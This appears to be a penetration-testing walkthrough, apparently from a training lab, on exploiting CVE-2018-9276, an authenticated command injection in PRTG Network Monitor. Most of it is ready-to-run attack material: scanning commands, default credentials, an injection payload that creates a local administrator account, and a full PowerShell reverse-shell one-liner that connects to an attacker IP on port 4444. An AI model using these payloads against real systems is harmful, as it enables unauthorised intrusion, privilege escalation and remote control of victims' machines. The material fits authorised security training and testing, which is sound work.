# enumeration ### Introduction This section details how to exploit PRTG Network Monitor, specifically focusing on CVE-2018-9276, an authenticated command injection vulnerability. The following steps guide the exploitation process: *** ### 1. Discovery and Enumeration #### Nmap Scan Use Nmap to scan all TCP ports and identify service versions: ```bash sudo nmap -sV -p- --open -T4 10.129.201.50 ``` Look for port `8080` with "Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor)." #### EyeWitness Scan EyeWitness may reveal default credentials (`prtgadmin:prtgadmin`). #### cURL Version Check Retrieve the PRTG version from the web page's source code: ```bash curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version ``` *** ### 2. Exploiting CVE-2018-9276 (Authenticated Command Injection) #### Login Attempt to log in with default or discovered credentials (`prtgadmin:Password123`). #### Navigate to Notifications * Go to **Setup** -> **Account Settings** -> **Notifications** in the PRTG web interface. #### Add a New Notification 1. Click **Add new notification**. 2. Name the notification (e.g., `pwn`). 3. Scroll down and check **EXECUTE PROGRAM**. 4. In **Program File**, select `Demo exe notification - outfile.ps1`. 5. In the **Parameter** field, enter the command injection payload: ```plaintext test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add ``` 6. Click **Save**. #### Test Notification * On the Notifications page, click the **Test** button for the newly created notification. * A popup will say **EXE notification is queued up**. *** ### 3. Verification #### Using CrackMapExec (SMB) Check if the new user has local admin access: ```bash sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG! ``` #### Alternative Verification Methods * Try logging in via **RDP**, **WinRM**, or using: * `evil-winrm` * `wmiexec.py` * `psexec.py` (from the Impacket toolkit) *** ### 4. Reverse Shell (Alternative Payload) Instead of adding a user, execute a PowerShell reverse shell: ```plaintext test.txt;powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` #### Start Netcat Listener On your attack machine: ```bash nc -lvp 4444 ``` *** ### Key Points * **Replace** `10.129.201.50` with the target IP address. * **Modify** `10.10.14.15:4444` to match your attacker's IP and port. * **Use semicolons (;)** to separate commands in the payload. * **Ensure the target PRTG version is vulnerable** (before `18.2.39`). * **PowerShell execution policies** may block scripts—consider bypass techniques. * **Always test on systems where you have explicit permission.**